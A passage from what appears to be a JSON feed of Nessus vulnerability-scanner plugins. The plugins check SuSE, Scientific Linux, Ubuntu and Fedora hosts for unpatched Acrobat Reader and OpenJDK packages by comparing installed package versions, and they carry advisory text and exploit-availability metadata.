70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51698);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6881)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 10 host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - Cross-domain request vulnerability CVE-2010-0188: CVSS\n v2 Base Score: 6.8 An unspecified vulnerability that\n possibly allowed remote code execution. (CVE-2010-0186:\n CVSS v2 Base Score: 5.8)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0188.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply ZYPP patch number 6881.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-cmaps-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ja-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-ko-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_CN-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-fonts-zh_TW-9.3.1-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:00:00", "description": "This update of acroread fixes :\n\n - Cross-domain request vulnerability CVE-2010-0188: CVSS v2 Base Score: 6.8 An unspecified vulnerability that possibly allowed remote code execution. (CVE-2010-0186:\n CVSS v2 Base Score: 5.8)", "cvss3": {}, "published": "2011-01-27T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6879)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0186", "CVE-2010-0188"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_ACROREAD-6879.NASL", "href": "https://www.tenable.com/plugins/nessus/51697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51697);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\"CVE-2010-0186\", \"CVE-2010-0188\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 6879)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 10 host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of acroread fixes :\n\n - Cross-domain request vulnerability CVE-2010-0188: CVSS\n v2 Base Score: 6.8 An unspecified vulnerability that\n possibly allowed remote code execution. (CVE-2010-0186:\n CVSS v2 Base Score: 5.8)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-0188.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply ZYPP patch number 6879.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Acrobat Bundled LibTIFF Integer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-9.3.1-0.3\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-cmaps-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-fonts-ja-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-fonts-ko-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-fonts-zh_CN-9.3.1-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread-fonts-zh_TW-9.3.1-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:51", "description": "Two improper permission check issues were discovered in the reflection API in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\n\nAll running instances of OpenJDK Java must be restarted for the update to take effect.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : java-1.7.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130116)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-debuginfo", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-devel", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-javadoc", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-src", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20130116_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/63607", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63607);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Scientific Linux Security Update : java-1.7.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130116)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Two improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\n\nAll running instances of OpenJDK Java must be restarted for the update\nto take effect.\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1301&L=scientific-linux-errata&T=0&P=700\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?208272cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:09", "description": "It was discovered that OpenJDK 7's security mechanism could be bypassed via Java applets. If a user were tricked into opening a malicious website, a remote attacker could exploit this to perform arbitrary code execution as the user invoking the program.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "Ubuntu 12.10 : openjdk-7 vulnerabilities (USN-1693-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-cacao", "p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-jamvm", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-headless", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-lib", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero", "cpe:/o:canonical:ubuntu_linux:12.10"], "id": "UBUNTU_USN-1693-1.NASL", "href": "https://www.tenable.com/plugins/nessus/63609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1693-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63609);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"USN\", value:\"1693-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Ubuntu 12.10 : openjdk-7 vulnerabilities (USN-1693-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that OpenJDK 7's security mechanism could be\nbypassed via Java applets. If a user were tricked into opening a\nmalicious website, a remote attacker could exploit this to perform\narbitrary code execution as the user invoking the program.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/1693-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2022 Canonical, Inc. / NASL script (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-cacao\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-jamvm\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-headless\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-lib\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-zero\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-7-jre-cacao / icedtea-7-jre-jamvm / openjdk-7-jre / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:32", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that potentially allow arbitrary code execution (including remotely via applets).\n\nIt is strongly recommended that all Java users in Fedora immediately update to this release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "Fedora 18 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18 (2013-0853)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-0853.NASL", "href": "https://www.tenable.com/plugins/nessus/63584", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0853.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63584);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0853\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Fedora 18 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18 (2013-0853)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?624fa2f6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.7.0-openjdk package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 